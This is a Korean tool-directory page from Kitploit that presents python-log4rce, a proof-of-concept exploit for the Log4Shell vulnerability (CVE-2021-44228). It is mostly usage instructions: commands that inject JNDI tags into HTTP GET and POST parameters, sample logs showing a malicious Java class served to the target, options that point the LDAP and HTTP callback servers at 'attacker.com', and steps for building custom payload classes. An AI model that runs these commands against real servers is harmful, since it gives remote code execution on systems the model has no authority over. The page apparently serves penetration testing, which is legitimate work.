Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
python-log4rce — CVE-2021-44228을 위한 올인원 순수 Python PoC | Kitploit
도구/GitHubGitHub/alexandre-lavoie/python-log4rce
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubalexandre-lavoie/python-log4rce

python-log4rce

CVE-2021-44228을 위한 올인원 순수 Python PoC

저장소 보기
178294년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Python Log4RCE

CVE-2021-44228에 대한 올인원 순수 Python3 PoC입니다.

샘플

root@kitploit:~
> python3 log4rce.py --target "linux" --payload "PAYLOAD" http -X POST --url "http://localhost:8080/" --data "address=###"
root@kitploit:~
INFO:HTTP:Running on local port 1337
INFO:HTTP:Remote target is http://127.0.0.1:1337/LinuxExploit.class
INFO:LDAP:Running on local port 1387
INFO:Log4J:Sending payload to http://localhost:8080/
INFO:LDAP:Query from ('127.0.0.1', 42554)
INFO:HTTP:Request from ('127.0.0.1', 55328) to /LinuxExploit.class
INFO:Log4J:Done!

사용법

이것은 CLI 도구입니다. 모든 옵션은 도움말 메뉴에서 확인할 수 있습니다:

root@kitploit:~
python3 log4rce.py --help

목록이 상당히 방대하므로, 다음은 기능 요약을 제공합니다.

공격 모드

이 도구는 몇 가지 공격 모드를 사용할 수 있게 해줍니다. 이러한 공격은 Log4RCE 클래스의 확장입니다.

HTTP

대상 URL에 대해 자동화된 HTTP 요청 공격을 수행할 수 있습니다.

다음과 같이 GET 요청을 수행할 수 있습니다:

root@kitploit:~
python3 log4rce.py http --url "http://www.vuln.com:1234/?vuln_param=###&param=123" --headers="P1=123&P2=123"

다음과 같이 POST 요청을 수행할 수 있습니다:

root@kitploit:~
python3 log4rce.py http -X POST --url "http://www.vuln.com:1234/" --data "vuln_param=###&param=123" --headers="P1=123&P2=123"

위의 방법은 JNDI 태그를 ###에 주입합니다.

수동

위의 방법을 사용할 수 없는 경우, 이 모드를 사용하여 JDNI 태그를 덤프하십시오:

root@kitploit:~
python3 log4rce.py manual

네트워크 설정

이 도구는 대부분의 네트워크 구성에 대해 광범위한 사용자 지정을 허용합니다. 모든 내부 서버는 원격 설정에 따라 다른 위치를 가리키도록 수정할 수 있습니다.

HTTP 서버

다음 매개변수를 사용하여 HTTP 서버를 구성할 수 있습니다:

root@kitploit:~
python3 log4rce.py --http_port 1234 --http_rport 12345 --http_host "attacker.com"
root@kitploit:~
http_port: The local port to run the server on.
http_rport: The port that a remote machine accesses.
http_host: The host name/IP a remote machine accesses. 

LDAP 서버

다음 매개변수를 사용하여 LDAP 서버를 구성할 수 있습니다:

root@kitploit:~
python3 log4rce.py --ldap_port 1234 --ldap_rport 12345 --ldap_host "attacker.com"
root@kitploit:~
ldap_port: The local port to run the server on.
ldap_rport: The port that a remote machine accesses.
ldap_host: The host name/IP a remote machine accesses. 

사용자 지정

이 도구는 일부 사용자 지정을 처리할 수 있습니다. 다음은 관심 있을 만한 몇 가지 기능을 나열합니다.

페이로드 주입

다음을 사용하여 Java 클래스에 페이로드를 주입할 수 있습니다:

root@kitploit:~
python3 log4rce.py --payload "PAYLOAD"

페이로드는 "###" 문자열에 주입됩니다.

사용자 Java 페이로드

다음을 사용하여 자신만의 Java 클래스를 빌드할 수 있습니다.

root@kitploit:~
javac -source 1.7 -target 1.7 /path/to/Exploit.java

결과 .class 파일은 다음을 사용하여 실행할 수 있습니다:

root@kitploit:~
python3 log4rce.py --java_class "/path/to/Exploit.class" ...

참고: 페이로드 주입을 허용하기 위해 문자열 "###"을 추가할 수 있습니다.

도구 다운로드